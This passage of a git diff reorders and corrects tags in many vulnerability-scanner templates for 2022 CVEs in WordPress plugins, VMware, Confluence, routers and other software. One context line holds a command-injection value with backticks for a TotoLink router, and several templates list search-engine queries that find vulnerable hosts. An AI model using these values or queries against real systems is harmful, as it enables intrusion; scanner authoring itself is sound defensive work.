cve2022,cve,ssrf,wordpress,wp-plugin,wp,wpscan,external-media-without-import,authenticated,intrusive,external_media_without_import_project http: - raw: diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml index ec52c1ef39..36d2b73177 100644 --- a/http/cves/2022/CVE-2022-1442.yaml +++ b/http/cves/2022/CVE-2022-1442.yaml @@ -31,7 +31,7 @@ info: product: metform_elementor_contact_form_builder framework: wordpress google-query: inurl:/wp-content/plugins/metform - tags: wpscan,cve2022,wordpress,wp-plugin,disclosure,unauth,metform,cve,wp,wpmet + tags: cve,cve2022,wpscan,wordpress,wp-plugin,disclosure,unauth,metform,wp,wpmet http: - raw: diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml index bb8f8ab554..24e1ba9ce1 100644 --- a/http/cves/2022/CVE-2022-1574.yaml +++ b/http/cves/2022/CVE-2022-1574.yaml @@ -28,7 +28,7 @@ info: vendor: html2wp_project product: html2wp framework: wordpress - tags: wp-plugin,wp,fileupload,unauth,wpscan,cve2022,wordpress,intrusive,cve,html2wp,html2wp_project + tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project http: - raw: diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index bd7429d21c..9c60cc18d3 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -26,7 +26,7 @@ info: vendor: hc_custom_wp-admin_url_project product: hc_custom_wp-admin_url framework: wordpress - tags: unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,hc_custom_wp-admin_url_project + tags: cve,cve2022,unauth,wpscan,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,hc_custom_wp-admin_url_project http: - raw: diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml index fb2222f75c..f95acde2a3 100644 --- a/http/cves/2022/CVE-2022-1597.yaml +++ b/http/cves/2022/CVE-2022-1597.yaml @@ -28,7 +28,7 @@ info: product: wpqa_builder framework: wordpress google-query: inurl:/wp-content/plugins/wpqa - tags: wpscan,xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa,2code + tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,wpqa,2code variables: user: "{{to_lower(rand_base(5))}}" pass: "{{user}}{{to_lower(rand_base(3))}}" diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml index cff82641ab..c6e3bb9dff 100644 --- a/http/cves/2022/CVE-2022-1609.yaml +++ b/http/cves/2022/CVE-2022-1609.yaml @@ -20,7 +20,7 @@ info: metadata: verified: false max-request: 1 - tags: rce,wp,backdoor,wpscan,cve,cve2022,wordpress + tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress variables: cmd: "echo CVE-2022-1609 | rev" diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index 92c67774b0..529bf8481d 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -28,7 +28,7 @@ info: vendor: diagrams product: drawio shodan-query: http.title:"Flowchart Maker" - tags: drawio,ssrf,oss,huntr,cve,cve2022,diagrams + tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams http: - raw: diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index c05e8c9352..a718ae3382 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -26,7 +26,7 @@ info: vendor: simple-membership-plugin product: simple_membership framework: wordpress - tags: xss,wp,wordpress,wpscan,cve,cve2022,wp-plugin,simple-membership-plugin + tags: cve,cve2022,xss,wp,wordpress,wpscan,wp-plugin,simple-membership-plugin http: - method: GET diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index b39deaa667..8f9edefb6a 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -28,7 +28,7 @@ info: product: newsletter framework: wordpress publicwww-query: "/wp-content/plugins/newsletter/" - tags: wpscan,cve,cve2022,newsletter,xss,authenticated,thenewsletterplugin,wordpress + tags: cve,cve2022,wpscan,newsletter,xss,authenticated,thenewsletterplugin,wordpress http: - raw: diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index cfa908d3cf..b7376b2e8e 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: diagrams product: drawio - tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph,diagrams + tags: cve,cve2022,huntr,drawio,ssrf,oast,oss,jgraph,diagrams http: - raw: diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml index 1574c5b644..8c6f6751eb 100644 --- a/http/cves/2022/CVE-2022-1904.yaml +++ b/http/cves/2022/CVE-2022-1904.yaml @@ -27,7 +27,7 @@ info: vendor: fatcatapps product: easy_pricing_tables framework: wordpress - tags: wp,wordpress,wpscan,cve,cve2022,wp-plugin,xss,fatcatapps + tags: cve,cve2022,wp,wordpress,wpscan,wp-plugin,xss,fatcatapps http: - method: GET diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index eecdef876c..2b31f9ddb9 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -28,7 +28,7 @@ info: product: copyright_proof framework: wordpress google-query: inurl:/wp-content/plugins/digiproveblog - tags: wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022,digiprove + tags: cve,cve2022,wordpress,xss,wp-plugin,wp,wpscan,digiprove http: - raw: diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml index 3d660f248b..ae396af9b7 100644 --- a/http/cves/2022/CVE-2022-1910.yaml +++ b/http/cves/2022/CVE-2022-1910.yaml @@ -28,7 +28,7 @@ info: vendor: averta product: shortcodes_and_extra_features_for_phlox_theme framework: wordpress - tags: wordpress,xss,auxin-elements,wpscan,cve,cve2017,wp-plugin,wp,averta + tags: cve,cve2022,wordpress,xss,auxin-elements,wpscan,wp-plugin,wp,averta http: - method: GET diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml index 990651f4f4..569c2cd1a1 100644 --- a/http/cves/2022/CVE-2022-1916.yaml +++ b/http/cves/2022/CVE-2022-1916.yaml @@ -26,7 +26,7 @@ info: vendor: pluginus product: active_products_tables_for_woocommerce framework: wordpress - tags: wordpress,wp-plugin,xss,wpscan,cve,cve2022,wp,pluginus + tags: cve,cve2022,wordpress,wp-plugin,xss,wpscan,wp,pluginus http: - method: GET diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml index 6af3585cd7..51d8a84c85 100644 --- a/http/cves/2022/CVE-2022-1933.yaml +++ b/http/cves/2022/CVE-2022-1933.yaml @@ -28,7 +28,7 @@ info: vendor: collect_and_deliver_interface_for_woocommerce_project product: collect_and_deliver_interface_for_woocommerce framework: wordpress - tags: cdi,wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,collect_and_deliver_interface_for_woocommerce_project + tags: cve,cve2022,cdi,wpscan,wp-plugin,wp,wordpress,xss,collect_and_deliver_interface_for_woocommerce_project http: - method: GET diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml index 1a43f360ac..4dbd70f6d4 100644 --- a/http/cves/2022/CVE-2022-1946.yaml +++ b/http/cves/2022/CVE-2022-1946.yaml @@ -28,7 +28,7 @@ info: product: gallery framework: wordpress google-query: inurl:"/wp-content/plugins/gallery-album/" - tags: wpscan,cve2022,wp,xss,wordpress,gallery,unauth,cve,wp-plugin,wpdevart + tags: cve,cve2022,wpscan,wp,xss,wordpress,gallery,unauth,wp-plugin,wpdevart http: - method: GET diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index 4be7f004e7..e03f4e94cd 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -27,7 +27,7 @@ info: vendor: automattic product: sensei_lms framework: wordpress - tags: wp,disclosure,wpscan,cve,cve2022,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic + tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic http: - method: GET diff --git a/http/cves/2022/CVE-2022-21587.yaml b/http/cves/2022/CVE-2022-21587.yaml index fcc5ea8f71..f0c021c99f 100644 --- a/http/cves/2022/CVE-2022-21587.yaml +++ b/http/cves/2022/CVE-2022-21587.yaml @@ -25,7 +25,7 @@ info: max-request: 3 vendor: oracle product: e-business_suite - tags: cve,intrusive,ebs,unauth,kev,cve2022,rce,oast,oracle,packetstorm + tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm http: - raw: diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index ae320cd39a..7cf7085608 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: wordpress product: wordpress - tags: wp,sqli,wpquery,wpscan,packetstorm,cve,cve2022,wordpress + tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress http: - raw: diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml index 99ac01b5df..3138c32ad5 100644 --- a/http/cves/2022/CVE-2022-21705.yaml +++ b/http/cves/2022/CVE-2022-21705.yaml @@ -27,7 +27,7 @@ info: max-request: 5 vendor: octobercms product: october - tags: cve,cve2022,authenticated,rce,cms,octobercms,injection + tags: cve2022,cve,authenticated,rce,cms,octobercms,injection http: - raw: diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml index 6c941af925..d867a3293d 100644 --- a/http/cves/2022/CVE-2022-2174.yaml +++ b/http/cves/2022/CVE-2022-2174.yaml @@ -26,7 +26,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 - tags: huntr,cve,cve2023,microweber,xss,unauth + tags: cve,cve2022,huntr,microweber,xss,unauth http: - method: GET diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml index 961ce7b9ff..23151f84ec 100644 --- a/http/cves/2022/CVE-2022-2187.yaml +++ b/http/cves/2022/CVE-2022-2187.yaml @@ -27,7 +27,7 @@ info: vendor: contact_form_7_captcha_project product: contact_form_7_captcha framework: wordpress - tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,wp,contact_form_7_captcha_project + tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,wp,contact_form_7_captcha_project http: - method: GET diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index 0fc763a9ef..e0474c2506 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -26,7 +26,7 @@ info: vendor: brizy product: unyson framework: wordpress - tags: authenticated,cve,cve2022,wordpress,wp,xss,unyson,wp-plugin,wpscan,brizy + tags: cve,cve2022,authenticated,wordpress,wp,xss,unyson,wp-plugin,wpscan,brizy http: - raw: diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 84b29960c5..1ea5abbe2b 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -29,7 +29,7 @@ info: vendor: juniper product: junos shodan-query: title:"Juniper Web Device Manager" - tags: cve,cve2022,xss,juniper,junos + tags: cve2022,cve,xss,juniper,junos http: - method: GET diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml index 932a9b51ac..37cc943c73 100644 --- a/http/cves/2022/CVE-2022-22733.yaml +++ b/http/cves/2022/CVE-2022-22733.yaml @@ -29,7 +29,7 @@ info: vendor: apache product: shardingsphere_elasticjob-ui shodan-query: http.favicon.hash:816588900 - tags: cve,cve2023,exposure,sharingsphere,apache + tags: cve2022,cve,exposure,sharingsphere,apache http: - raw: diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 2c3e14e9d0..8574f55bc6 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -29,7 +29,7 @@ info: product: ap_pagebuilder framework: prestashop shodan-query: http.component:"Prestashop" - tags: packetstorm,cve,cve2022,prestashop,sqli,unauth,apollotheme + tags: cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme http: - raw: diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index 4fdfcef06f..22f0cb0277 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -28,7 +28,7 @@ info: vendor: vmware product: identity_manager shodan-query: http.favicon.hash:-1250474341 - tags: workspaceone,kev,tenable,packetstorm,cve,cve2022,vmware,ssti + tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti http: - method: GET diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml index 4ce35cba09..265dc5fdb2 100644 --- a/http/cves/2022/CVE-2022-22963.yaml +++ b/http/cves/2022/CVE-2022-22963.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: vmware product: spring_cloud_function - tags: vulhub,cve,cve2022,springcloud,rce,kev,vmware + tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware http: - raw: diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml index ad491de065..99e6a43ed8 100644 --- a/http/cves/2022/CVE-2022-22965.yaml +++ b/http/cves/2022/CVE-2022-22965.yaml @@ -28,7 +28,7 @@ info: max-request: 4 vendor: vmware product: spring_framework - tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev,vmware + tags: cve2022,cve,rce,spring,injection,oast,intrusive,kev,vmware http: - raw: diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index 9f5d02bc65..d5644a0ea1 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -28,7 +28,7 @@ info: vendor: vmware product: identity_manager fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" - tags: cve,cve2022,vmware,auth-bypass,oast + tags: cve2022,cve,vmware,auth-bypass,oast http: - raw: diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 5ce305e24f..222466a25b 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -28,7 +28,7 @@ info: vendor: siemens product: sinema_remote_connect_server shodan-query: title:"Logon - SINEMA Remote Connect" - tags: packetstorm,seclists,cve,cve2022,redirect,sinema,authenticated,siemens + tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens http: - raw: diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index e1160aaf44..9a8c0707df 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -30,7 +30,7 @@ info: product: metersphere shodan-query: html:"metersphere" fofa-query: title="MeterSphere" - tags: cve,cve2022,metersphere,ssrf,oast + tags: cve2022,cve,metersphere,ssrf,oast,xss http: - method: GET diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml index f03cadc7ce..261e2216e2 100644 --- a/http/cves/2022/CVE-2022-2373.yaml +++ b/http/cves/2022/CVE-2022-2373.yaml @@ -28,7 +28,7 @@ info: vendor: nsqua product: simply_schedule_appointments framework: wordpress - tags: simply-schedule-appointments,unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp,nsqua + tags: cve,cve2022,simply-schedule-appointments,unauth,wpscan,wordpress,wp-plugin,wp,nsqua http: - method: GET diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml index 7c053c18be..8b0fcc1d6a 100644 --- a/http/cves/2022/CVE-2022-2379.yaml +++ b/http/cves/2022/CVE-2022-2379.yaml @@ -28,7 +28,7 @@ info: vendor: easy_student_results_project product: easy_student_results framework: wordpress - tags: wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,cve,cve2022,easy_student_results_project + tags: cve,cve2022,wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,easy_student_results_project http: - raw: diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index eb4bd558d6..153fcc482d 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -28,7 +28,7 @@ info: vendor: slickremix product: feed_them_social framework: wordpress - tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss,slickremix + tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix http: - method: GET diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index 0083bd491e..423730b536 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -30,7 +30,7 @@ info: vendor: aveva product: intouch_access_anywhere shodan-query: http.html:"InTouch Access Anywhere" - tags: lfi,packetstorm,cve,cve2022,aveva,intouch + tags: cve,cve2022,lfi,packetstorm,aveva,intouch http: - method: GET diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index fc459fd340..744e6a22d3 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -28,7 +28,7 @@ info: vendor: casbin product: "casdoor" shodan-query: http.title:"Casdoor" - tags: sqli,unauth,packetstorm,edb,cve,cve2022,casdoor,casbin + tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin http: - method: GET diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index f99ac388f7..a179c1d576 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: thedigitalcraft product: atomcms - tags: packetstorm,cve,cve2022,sqli,atom,cms,thedigitalcraft + tags: cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft http: - raw: diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index 41237dea11..5cec91c845 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms + tags: cve2022,cve,sqli,cuppa,authenticated,cuppacms http: - raw: diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index 34465788c2..e0b197e811 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -29,7 +29,7 @@ info: vendor: transposh product: transposh_wordpress_translation framework: wordpress - tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh + tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh,xss http: - method: POST diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index b9ff0488a2..50349ab9eb 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -28,7 +28,7 @@ info: vendor: icinga product: icinga_web_2 shodan-query: title:"Icinga" - tags: packetstorm,cve,cve2023,icinga,lfi + tags: cve,cve2022,packetstorm,icinga,lfi http: - method: GET diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index c8568f3c72..c0bd822d03 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: flyte product: flyte_console - tags: cve,cve2022,flyteconsole,ssrf,oss,hackerone,flyte + tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte http: - method: GET diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index 019a58f516..c4d203bc05 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -29,7 +29,7 @@ info: vendor: wavlink product: wl-wn535k2_firmware shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2022,iot,wavlink,router,rce,oast + tags: cve2022,cve,iot,wavlink,router,rce,oast http: - raw: diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index e7d0fbe398..7572594dc8 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: piano_led_visualizer_project product: piano_led_visualizer - tags: cve,cve2022,lfi,piano,iot,oss,piano_led_visualizer_project + tags: cve2022,cve,lfi,piano,iot,oss,piano_led_visualizer_project http: - method: GET diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index 1613fc6c65..d98fa0972f 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -27,7 +27,7 @@ info: vendor: terra-master product: terramaster_operating_system shodan-query: "TerraMaster" - tags: packetstorm,cve,cve2022,terramaster,exposure,kev,terra-master + tags: cve,cve2022,packetstorm,terramaster,exposure,kev,terra-master http: - method: GET diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index 8cfdee501a..264acdd1d6 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: totolink product: a950rg_firmware - tags: totolink,cve,cve2022,router,unauth,rce,iot,intrusive + tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive variables: cmd: "`ls>../{{randstr}}`" diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index 184507d76d..c6b617f2dc 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -28,7 +28,7 @@ info: product: wp_statistics framework: wordpress google-query: inurl:/wp-content/plugins/wp-statistics - tags: packetstorm,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs + tags: cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: - raw: diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index 66d110d2b1..5fde0f4f52 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -27,7 +27,7 @@ info: product: wp_statistics framework: wordpress publicwww-query: "/wp-content/plugins/wp-statistics/" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs + tags: cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: - raw: diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index d43fce3395..6adea7b341 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: zerof product: web_server - tags: xss,cve,cve2022,zerof + tags: cve,cve2022,xss,zerof http: - method: GET diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index 12f8bac022..98406cc00f 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -25,7 +25,7 @@ info: product: searchwp_live_ajax_search framework: wordpress publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/" - tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp + tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp http: - method: GET diff --git a/http/cves/2022/CVE-2022-25369.yaml b/http/cves/2022/CVE-2022-25369.yaml index 6b39102945..c8150e8209 100644 --- a/http/cves/2022/CVE-2022-25369.yaml +++ b/http/cves/2022/CVE-2022-25369.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Dynamicweb" - tags: cve,cve2022,dynamicweb,rce,unauth + tags: cve2022,cve,dynamicweb,rce,unauth http: - method: GET diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml index cfed6a38a2..46960385fd 100644 --- a/http/cves/2022/CVE-2022-2544.yaml +++ b/http/cves/2022/CVE-2022-2544.yaml @@ -28,7 +28,7 @@ info: vendor: wpmanageninja product: ninja_job_board framework: wordpress - tags: ninja,exposure,wpscan,cve,cve2022,wordpress,wp-plugin,wp,wpmanageninja + tags: cve2022,cve,ninja,exposure,wpscan,wordpress,wp-plugin,wp,wpmanageninja http: - method: GET diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index 5640b17e11..b784c49dc9 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -29,7 +29,7 @@ info: vendor: servmask product: all-in-one_wp_migration framework: wordpress - tags: cve,all-in-one-wp-migration,authenticated,wpscan,cve2022,wordpress,wp-plugin,wp,xss,servmask + tags: cve,cve2022,all-in-one-wp-migration,authenticated,wpscan,wordpress,wp-plugin,wp,xss,servmask http: - raw: diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index ee9ae17a03..a70778fc23 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: thedigitalcraft product: atomcms - tags: cve,cve2022,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft + tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft http: - raw: diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 777c89b5da..cd6a362de0 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -29,7 +29,7 @@ info: product: duplicator framework: wordpress google-query: inurl:/backups-dup-lite/dup-installer/ - tags: cve2022,wordpress,wp,wp-plugin,duplicator,wpscan,cve,snapcreek + tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek http: - method: GET diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index 95a414bb9a..78dd13e15d 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -24,7 +24,7 @@ info: vendor: motioneye_project product: motioneye shodan-query: html:"MotionEye" - tags: cve,cve2023,motioneye,config,motioneye_project + tags: cve,cve2022,motioneye,config,motioneye_project http: - method: GET diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 3bf7045c63..617fb4533e 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -28,7 +28,7 @@ info: vendor: anti-malware_security_and_brute-force_firewall_project product: anti-malware_security_and_brute-force_firewall framework: wordpress - tags: wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,cve,cve2022,anti-malware_security_and_brute-force_firewall_project + tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project http: - raw: diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index f19ab18dd4..ebc02a56a2 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -30,7 +30,7 @@ info: vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" - tags: packetstorm,cve,cve2022,confluence,rce,ognl,oast,kev,atlassian + tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian http: - method: GET diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index ca6ac3eaee..60fdf5998e 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -29,7 +29,7 @@ info: vendor: atlassian product: questions_for_confluence shodan-query: http.component:"Atlassian Confluence" - tags: 